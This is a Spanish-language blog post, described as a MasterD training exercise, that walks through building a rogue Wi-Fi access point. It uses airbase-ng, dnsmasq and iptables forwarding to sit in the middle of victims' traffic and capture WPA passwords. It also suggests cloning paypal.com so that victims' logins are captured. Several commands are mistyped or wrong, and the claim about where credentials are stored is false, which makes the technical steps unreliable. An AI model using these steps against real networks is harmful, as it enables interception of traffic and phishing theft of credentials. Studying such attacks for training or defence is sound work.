Inicio MTD - Fake Ap
Entrada
Cancelar

MTD - Fake Ap

¡Hola! Hoy vamos a montar un fake AP para poder obtener la contraseña WPA de la red Wireless, puede usarse un método manual con airbase-ng, o algún script automatizado.

Técnicas Vistas:

  • RogueApp con Airbase
  • DNSmasq
  • Duplicado de Servicio Web
    • *

Preparación Entorno

Para empezar con nuestro ejercicio comenzaremos con la creación del FakeAP con rogueAP. Para esto necesitaremos tener nuestra interfaz USB activada en modo monitor.

1
airmon-ng check kill
1
airmon-ng start wlan0

Y con ello mataremos cualquier proceso que pueda hacer crashear nuestra interfaz USB e iniciaremos el modo monitor en nuestra interfaz USB, podemos comprobarlo con el uso de iwconfig.


RogueAP con Airbase

Una vez preparada nuestra interfaz USB podremos comenzar con la creación del Rogue Acces Point para obtener las credenciales WPA, para ello suplantaremos la dirección MAC, el nombre y su canal del punto de acceso.

Nuestro nombre de red será Concepto De Prueba en este caso para poder visualizar bien el ejercicio y lo colocaremos en el canal 6 y lo iniciaremos en la interfaz USB en Mode : Monitor

1
airbase-ng -c 6 -essid "Prueba de concepto" wlan0mon

Una vez creado el Acces Point veremos que se nos crea una nueva interfaz de red at0, lo que haremos es configurarla para que sea la puerta de enlace hacia nuestra red.


Configuración de RogueAP

Nuestro objetivo en este punto es hacer que nuestra nueva interfaz de red at0 sea la puerta de enlace hacia nuestra red así poder esnifar el tráfico y estar en medio de las comunicaciones.

1
ifconfig at0 192.168.1.1 netmask 255.255.255.0
1
at0 up

Podemos observar con ìfconfig que nuestra interfaz de red tiene la dirección de IP y la máscara red seleccionada.

En el siguiente punto veremos como configurar dnsmasq para poder enrutar la conexión de nuestra nueva red con nuestra máquina.


DNSMASQ

Dnsmasq es un script automatizado que nos ayudará a enrutar las redes de nuestra máquina con la nueva red que hemos creado como Rogue Acces Point.

DNSMASQ lo podemos instalar desde nuestra máquina linux facilmente apt install dnsmasq Una vez instalado vamos a ver la configuración red que tenemos preinstalada en nuestra máquina y enrutaremos la red Prueba de Concepto con la red que tenemos en nuestra máquina para ello usaremos

1
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 

Seguidamente limpiaremos las IPTABLES y nat

1
iptables f
1
iptables -f nat -F 

Y las enrutaremos de nuevo con las de nuestra red.

1
iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT
1
iptables -A FORWARD -i at0 -o eth0 -j ACCEPT

Al igual lo haremos en las tablas NAT

1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Una vez configurada las IPTABLES le diremos a nuestro sistema que nuestra interfaz de red va a servir para hacer un ip_forward lo que quiere decir que todo paquete que entre en nuestra red y no sea para nuestro equipo, nuestra máquina será la encargada de enviarlo hacia su destinatario. Lo que conseguimos ponernos en medio de las comunicaciones.

1
echo 1 > /proc/sys/nat/ipv4/ip_foward

Ahora ejecutaremos dnsmasq con el fichero de configuracion previamente configurado.

1
dnsmasq -C ./dnsmasq.conf -D

El comando -D hará que nuestro script se mantenga activo como un devil y en segundo plano trabajando como un servicio. Una vez establecida la conexión.


HABILITAR SERVICIO DE APACHE

En este punto de la conexión red podriamos hacer una aplicación web en relación con nuestra víctima (página web que suela frecuentar) y deberiamos configurarla en nuestro fichero /etc/host

Podríamos crear un duplicado de la web de paypal.com haciendo que cuando nuestra víctima entre, se conectará directamente a nuestra máquina que con un simple script hará que el firewall le solicite reloguearse haciendo que se guarden las credenciales en nuestro fichero de archivo etc/host


Esto es un ejercicio con fines didácticos realizado para MasterD.

Esta entrada está licenciada bajo CC BY 4.0 por el autor.
Etiquetas populares
Contenido
Etiquetas populares